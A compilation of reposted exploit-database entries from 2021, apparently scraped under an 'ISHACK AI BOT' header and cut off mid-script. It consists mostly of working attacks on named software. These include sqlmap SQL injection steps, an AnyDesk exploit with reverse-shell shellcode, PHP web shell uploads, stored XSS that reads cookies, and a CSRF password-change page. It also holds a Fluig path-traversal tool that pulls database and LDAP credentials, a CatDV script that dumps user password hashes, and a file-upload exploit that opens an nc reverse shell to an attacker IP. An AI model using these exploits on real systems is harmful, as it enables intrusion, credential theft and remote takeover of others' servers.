ISHACK AI BOT

# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - Blind & Error based SQL injection (Authenticated) # Date: 2021-03-02 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867 # Version: v1.0 # Tested on: Ubuntu # Detail walkthrough: https://medium.com/@tusharvaidya16/authenticated-blind-error-based-sql-injection-on-local-services-search-engine-management-system-3e99779f0850 *Steps to Reproduce:* 1) Login with Admin Credentials and click on the *Service Category* button. 2) Click on the *Manage Category* button. 3) Now add the double quote ( " ) in the URL after *editid parameter* 4) At that time we observe that the application is misbehaving now capture this request from the burp suite and save it into an SQL text file. 4) Now fire up the following command into SQLMAP CMD: sqlmap -r sql_file.txt --data="editid=1" --curent-db --level 5 --risk 3 4) We got a database. *Below request from sql_file.txt* GET /LSSMES/lssems/admin/edit-category-detail.php?editid=* HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://lcoalhost/LSSMES/lssems/admin/manage-category.php Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc Upgrade-Insecure-Requests: 1

# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution # Date: 09/06/20 # Exploit Author: scryh # Vendor Homepage: https://anydesk.com/en # Version: 5.5.2 # Tested on: Linux # Walkthrough: https://devel0pment.de/?p=1881 #!/usr/bin/env python import struct import socket import sys ip = '192.168.x.x' port = 50001 def gen_discover_packet(ad_id, os, hn, user, inf, func): d = chr(0x3e)+chr(0xd1)+chr(0x1) d += struct.pack('>I', ad_id) d += struct.pack('>I', 0) d += chr(0x2)+chr(os) d += struct.pack('>I', len(hn)) + hn d += struct.pack('>I', len(user)) + user d += struct.pack('>I', 0) d += struct.pack('>I', len(inf)) + inf d += chr(0) d += struct.pack('>I', len(func)) + func d += chr(0x2)+chr(0xc3)+chr(0x51) return d # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode shellcode = b"" shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48" shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xcb\x46\x40" shellcode += b"\x6c\xed\xa4\xe0\xfb\x48\x31\x58\x27\x48\x2d" shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xa1\x6f\x18\xf5\x87" shellcode += b"\xa6\xbf\x91\xca\x18\x4f\x69\xa5\x33\xa8\x42" shellcode += b"\xc9\x46\x41\xd1\x2d\x0c\x96\xf8\x9a\x0e\xc9" shellcode += b"\x8a\x87\xb4\xba\x91\xe1\x1e\x4f\x69\x87\xa7" shellcode += b"\xbe\xb3\x34\x88\x2a\x4d\xb5\xab\xe5\x8e\x3d" shellcode += b"\x2c\x7b\x34\x74\xec\x5b\xd4\xa9\x2f\x2e\x43" shellcode += b"\x9e\xcc\xe0\xa8\x83\xcf\xa7\x3e\xba\xec\x69" shellcode += b"\x1d\xc4\x43\x40\x6c\xed\xa4\xe0\xfb" print('sending payload ...') p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln'+shellcode, '\x85\xfe%18472249x%93$ln', 'ad', 'main') s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(p, (ip, port)) s.close() print('reverse shell should connect within 5 seconds')

# Exploit Title: e107 CMS 2.3.0 - CSRF # Date: 04/03/2021 # Exploit Author: Tadjmen # Vendor Homepage: https://e107.org # Software Link: https://e107.org/download # Version: 2.3.0 # Tested on: Windows 10 # CVE : CVE-2021-27885 CSRF vulnerability on e107 CMS ## Bug Description Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link. ## How to Reproduce Steps to reproduce the behavior: 1. Create a CSRF login POC using the following code. ``` <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Cross Site Request Forgery (Edit Existing Admin details)</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 2; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <H2>Cross Site Request Forgery (Edit Existing Admin details)</H2> <form method="POST" name="form0" action=" http://localhost/[path-to-e107-cms]/usersettings.php"> <input type="hidden" name="loginname" value="admin"/> <input type="hidden" name="email" value="[email]"/> <input type="hidden" name="password1" value="[password]"/> <input type="hidden" name="password2" value="[password]"/> <input type="hidden" name="hideemail" value="1"/> <input type="hidden" name="image" value=""/> <input type="hidden" name="signature" value=""/> <input type="hidden" name="updatesettings" value="Save settings"/> <input type="hidden" name="_uid" value="2"/> </form> </body> </html> ``` 2. Replace the email and password with the valid credentials. 3. Send the link script to the victim (admin) to make them click. 4. Login with new admin password

# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution # Date: 04/03/2021 # Exploit Author: Suraj Bhosale # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html # Version: 1.0 # Tested on Windows 10, XAMPP Request: ======== POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------14955282031852449676680360880 Content-Length: 972 Origin: http://localhost Connection: close Referer: http://localhost/onlineordering/GPST/store/index.php Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir Upgrade-Insecure-Requests: 1 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="transnum" VAF-XAP -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="select1" 25 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="pname" keychain -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="select2" 1 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="txtDisplay" 25 -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="note" test -----------------------------14955282031852449676680360880 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/octet-stream <?php echo "Shell";system($_GET['cmd']); ?> -----------------------------14955282031852449676680360880-- Response: ========= HTTP/1.1 200 OK Date: Thu, 04 Mar 2021 13:28:27 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27 X-Powered-By: PHP/7.3.27 Content-Length: 55 Connection: close Content-Type: text/html; charset=UTF-8 <meta http-equiv="refresh" content="1; url=index.php"> # Uploaded Malicious File can be Found in : onlineordering\GPST\store\design # go to http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname which will execute hostname command.

# Exploit Title: Textpattern CMS 4.8.4 - 'Comments' Persistent Cross-Site Scripting (XSS) # Date: 2021-03-04 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://textpattern.com # Software Link: https://textpattern.com/start # Version: v 4.8.4 # Tested on: Windows Steps-To-Reproduce: 1. Login into Textpattern CMS admin panel. 2. Now go to the *Content > C**omments > Message*. 3. Now paste the below payload in the URL field. Ba1man”><img src=x onerror=confirm(document.location)> 4. Now click on the *Save* button. 5. Now go to the https://site.com/articles/welcome-to-your-site#comments-head 5. The XSS will be triggered.

# Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS) # Date: 2021-03-04 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://textpattern.com # Software Link: https://textpattern.com/start # Version: v 4.9.0-dev # Tested on: Windows Steps-To-Reproduce: 1. Login into Textpattern CMS admin panel. 2. Now go to the *Content > Write > ** Excerpt*. 3. Now paste the below payload in the URL field. Ba1man”><img src=x onerror=confirm(document.cookie)> 4. Now click on the *Save* button. 5. Now go to the *articles* page 5. The XSS will be triggered.

# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated) # Date: 2021-03-04 # Exploit Author: Suraj Bhosale # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html # Version: v1.0 # Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9 # Vulnerable Parameter: id *Steps to Reproduce:* 1) Visit http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response. 2) Now fire up the following command into SQLMAP. CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9 <http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>* --batch --dbs 3) Using the above command we will get the name of all the database.

# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated) # Date: 04-03-2021 # Exploit Author: Deepak Kumar Bharti # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System # Version: 1.0 # Tested on: Windows 10 Pro # Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in Welcome page in quiz section eid parameter affected from this vulnerability. # URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34 POC: # go to url http://localhost/login.php # then you have to login with default creds # then go to quiz and execute the payload ie:-- http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

# Exploit Title: Textpattern 4.8.3 - Remote code execution (Authenticated) (2) # Date: 03/03/2021 # Exploit Author: Ricardo Ruiz (@ricardojoserf) # Vendor Homepage: https://textpattern.com/ # Software Link: https://textpattern.com/start # Version: Previous to 4.8.3 # Tested on: CentOS, textpattern 4.5.7 and 4.6.0 # Install dependencies: pip3 install beautifulsoup4 argparse requests # Example: python3 exploit.py -t http://example.com/ -u USER -p PASSWORD -c "whoami" -d import sys import argparse import requests from bs4 import BeautifulSoup def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-u', '--user', required=True, action='store', help='Username') parser.add_argument('-p', '--password', required=True, action='store', help='Password') parser.add_argument('-c', '--command', required=False, default="whoami", action='store', help='Command to execute') parser.add_argument('-f', '--filename', required=False, default="testing.php", action='store', help='PHP File Name to upload') parser.add_argument('-d', '--delete', required=False, default=False, action='store_true', help='Delete PHP file after executing command') my_args = parser.parse_args() return my_args def get_file_id(s, files_url, file_name): r = s.get(files_url, verify=False) soup = BeautifulSoup(r.text, "html.parser") for a in soup.findAll('a'): if "file_download/" in a['href']: file_id_name = a['href'].split('file_download/')[1].split("/") if file_id_name[1] == file_name: file_id = file_id_name[0] return file_id def login(login_url, user, password): s = requests.Session() s.get(login_url, verify=False) data = {"p_userid":user, "p_password":password, "_txp_token":""} r = s.post(login_url, data=data, verify=False) if str(r.status_code) == "401": print("[+] Invalid credentials") sys.exit(0) _txp_token = "" soup = BeautifulSoup(r.text, "html.parser") fields = soup.findAll('input') for f in fields: if (f['name'] == "_txp_token"): _txp_token = f['value'] return s,_txp_token def upload(s, login_url, _txp_token, file_name): php_payload = '<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n'*1000 # to avoid WAF problems php_payload += '<?php $test = shell_exec($_REQUEST[\'cmd\']); echo $test; ?>' s.post(login_url, files=(("MAX_FILE_SIZE", (None, "2000000")), ("event", (None, "file")), ("step", (None, "file_insert")), ("id", (None, "")), ("sort", (None, "")), ("dir", (None, "")), ("page", (None, "")), ("search_method", (None, "")), ("crit", (None, "")), ("thefile",(file_name, php_payload, 'application/octet-stream')), ("_txp_token", (None, _txp_token)),), verify=False) def exec_cmd(s, cmd_url, command): r = s.get(cmd_url+command, verify=False) response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","") return response def delete_file(s, login_url, file_id, _txp_token): data = {"selected[]":file_id,"edit_method":"delete","event":"file","step":"file_multi_edit","page":"1","sort":"filename","dir":"asc","_txp_token":_txp_token} s.post(login_url, data=data, verify=False) def main(): args = get_args() url = args.target user = args.user password = args.password file_name = args.filename command = args.command delete_after_execute = args.delete login_url = url + "/textpattern/index.php" upload_url = url + "/textpattern/index.php" cmd_url = url + "/files/" + file_name + "?cmd=" files_url = url + "/textpattern/index.php?event=file" s,_txp_token = login(login_url, user, password) print("[+] Logged in") upload(s, login_url, _txp_token, file_name) file_id = get_file_id(s, files_url, file_name) print("[+] File uploaded with id %s"%(file_id)) response = exec_cmd(s, cmd_url, command) print("[+] Command output \n%s"%(response)) if delete_after_execute: print("[+] Deleting uploaded file %s with id %s" %(file_name, file_id)) delete_file(s, login_url, file_id, _txp_token) else: print("[+] File not deleted. Url: %s"%(url + "/files/" + file_name)) if __name__ == "__main__": main()

# Exploit Title: Fluig 1.7.0 - Path Traversal # Date: 26/11/2020 # Exploit Author: Lucas Souza # Vendor Homepage: https://www.totvs.com/fluig/ # Version: <== 1.7.0-210217 # Tested on: 1.7.0-201124 #!/bin/bash url="$1" npayload=$2 > payload.txt curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner # -- FUNCTIONS -- function create-payload { > wordlist.txt count=1 while [[ $count -le $npayload ]]; do # WINDOWS PAYLOAD echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt # LINUX PAYLOAD echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt count=$[$count + 1] done } function manual-mode { while :; do echo echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m" echo echo -e "\033[0;32m -[ clear - Clear Screen\033[0m" echo -e "\033[0;32m -[ target - Set a target\033[0m" echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m" echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m" echo echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2 path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]') mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]') if [[ $path == 'info' ]]; then clear cat banner domain-xml elif [[ $path == 'clear' ]]; then clear elif [[ $path == 'target' ]]; then XmlPayload='' echo echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload enum else echo echo "$param../../../../../../../../../../../../..$path" > wordlist.txt wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt DirPath=$(head -1 payload.txt) if [[ $DirPath == '' ]]; then echo echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m' else curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile echo echo -e '\033[0;31m'$path'\033[0m' echo cat report/$mdr/$mkfile echo pwd=$(pwd) echo echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m' fi fi done } function domain-xml { domain=$(ls report/$mdr | grep domain.xml) if [[ $domain == '' ]]; then echo echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m' else echo echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m' echo echo -e ' \033[0;33m[!] INFORMATION\033[0m' echo curl -s -I $url | grep Server echo echo -e '\033[0;31mTarget\033[0m' echo $url echo echo -e '\033[0;31mPayload plaintext\033[0m' echo $XmlPayload | base64 -d echo echo echo -e '\033[0;31mPayload base64 encoded\033[0m' echo $XmlPayload echo echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g' echo echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g' echo echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g' echo echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m' echo cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g' cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g' echo manual-mode fi } function enum { mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///') mkdir -p report/$mdr if [[ $url == '' ]]; then clear cat banner echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m' echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m' echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m' manual-mode elif [[ $npayload == '' ]]; then npayload=25 clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m' echo echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m' echo create-payload else clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m' echo echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m' create-payload fi echo echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m' echo wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt payload=$(head -1 payload.txt) if [[ $payload == '' ]]; then clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m' echo echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m' echo manual-mode else param=$(echo $payload | base64 -d | cut -d '.' -f1) clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m' echo echo -e ' \033[0;33m[!] VULNERABLE\033[0m' echo echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m' echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt clear cat banner echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m' echo echo -e ' \033[0;33m[!] VULNERABLE\033[0m' echo curl -s -I $url | grep Server echo echo -e '\033[0;31mTarget\033[0m' echo $url echo echo -e '\033[0;31mPayload plaintext\033[0m' echo $payload | base64 -d echo echo echo -e '\033[0;31mPayload base64 encoded\033[0m' echo $payload echo fi XmlPayload=$(head -1 payload.txt) if [[ $XmlPayload == '' ]]; then echo echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m' manual-mode else curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml echo echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m' manual-mode fi } enum

# Exploit Title: CatDV 9.2 - RMI Authentication Bypass # Date: 3/1/2021 # Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc. # Vendor Homepage: https://catdv.com/ # Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe # Version: 9.2 and lower # Tested on: Windows, Mac import org.h2.engine.User; import squarebox.catdv.shared.*; import java.net.MalformedURLException; import java.rmi.Naming; import java.rmi.NotBoundException; import java.rmi.RemoteException; public class Runnable { public Runnable() throws RemoteException, NotBoundException, MalformedURLException { } private static int getValidSession(long createdTime, String claimedHost) { return (int)createdTime + claimedHost.hashCode(); } private static void printFields(SField[] fields) { for (SField field : fields) { System.out.println(field.fieldDefID); System.out.println(field.value); System.out.println(field.fieldDefinition); } } public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException { String target = "rmi://<HOST>:1099/CatDVServer"; ServerAPI look_up = (ServerAPI) Naming.lookup(target); System.out.println("Trying to get all connections"); SConnection[] connections = look_up.getConnections(); for (SConnection element : connections) { System.out.println("Found connection:"); System.out.println("CatDVUser:"+ element.catdvUser); System.out.println("ApiVersion:"+ element.apiVersion); System.out.println("User:"+ element.user); System.out.println("ClaimedHost:"+ element.claimedHost); System.out.println("ActualHost:"+ element.actualHost); System.out.println("Created:"+ element.created); System.out.println("LastUsed:"+ element.lastUsed); System.out.println("Client features:"+ element.clientFeatures); System.out.println("\n"); } System.out.println("Getting system properties"); System.out.println("Running from: "+look_up.getProperty("user.dir")); System.out.println("Running on: "+look_up.getProperty("os.arch")); System.out.println("Java version: "+look_up.getProperty("java.version")); //We can create a new client from most of the fields found in the existing connections which we can dump anonymously ClientID bob=new ClientID( connections[0].catdvUser, connections[0].claimedHost, getValidSession(connections[0].created,connections[0].claimedHost), connections[0].created, ""); System.out.println("\nCreated a new client with parameters: \n" + "" + "user:"+connections[0].catdvUser+"\n"+ "" + "claimedHost:"+connections[0].claimedHost+"\n"+ "" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+ "" + "created:"+connections[0].created+"\n"+ "" + "pubkey:"+""+ ""); String status = look_up.getStatus(bob); System.out.println("Status is: \n "+status); System.out.println("Attempting to dump users: \n"); SUser[] users=look_up.getUsers(bob, -1); for (SUser element: users) { System.out.println(element.name); System.out.println(element.passwordHash); System.out.println("id:" + element.ID); System.out.println("realname:" + element.realname); System.out.println("email:" + element.email); System.out.println("password:" + element.password); System.out.println("notes:" + element.notes); System.out.println("inactive:" + element.inactive); System.out.println("RoleiD:" + element.roleID); System.out.println("hash:" + element.passwordHash); System.out.println(""); } } }

# Exploit Title: Configuration Tool 1.6.53 - 'OpLclSrv' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 07-03-2021 # Vendor Homepage: https://www.oki.com # Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46226801&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6 # Tested Version: 1.6.53 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 8.1 Pro 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ OKI Local Port Manager OpLclSrv C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe Auto C:\>sc qc OpLclSrv [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: OpLclSrv TIPO: 10 WIN32_OWN_PROCESS TIPO_INICIO: 2 AUTO_START CONTROL_ERROR: 0 IGNORE NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\Common\extend3\portmgrsrv.exe GRUPO_ORDEN_CARGA: ETIQUETA: 0 NOMBRE_MOSTRAR: OKI Local Port Manager DEPENDENCIAS: NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 07-03-2021 # Vendor Homepage: https://www.oki.com # Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6 # Tested Version: 4.4.10 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 8.1 Pro 64 bits C:\Windows\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ OKI Local Port Manager OpLclSrv C:\Program Files\Okidata\Common\Extend3\portmgrsrv.exe Print Job Accounting OkiJaSvc C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe Print Job Accounting Watch Service OkiWchSvc C:\Program Files\Okidata\Print Job Accounting\okwchsvc.exe Print Job Accounting opja0004 opja0004 C:\Program Files\Okidata\Print Job Accounting\opja0004.exe C:\Windows\system32>sc qc OkiJaSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: OkiJaSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\Print Job Accounting\oklogsvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Print Job Accounting DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) # Date: 07-03-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # Executing this script against a target might return a reverse php shell. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): print("(+) Setting up reverse shell php file ..") random_file_name = str(random.randint(100000, 999999)) + "revshell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'),'btn_update':''}) print("(+) Trying to upload it ..") r1 = requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) r2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip)) if random_file_name in r2.text: print("(+) File upload seems to have been successful!") return random_file_name else: print("(-) Oh noes, file upload failed .. quitting!") exit() def trigger_shell(target_ip, random_file_name): print("(+) Now trying to trigger our shell..") r3 = requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name)) return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] revshell_file_name = file_upload(target_ip, 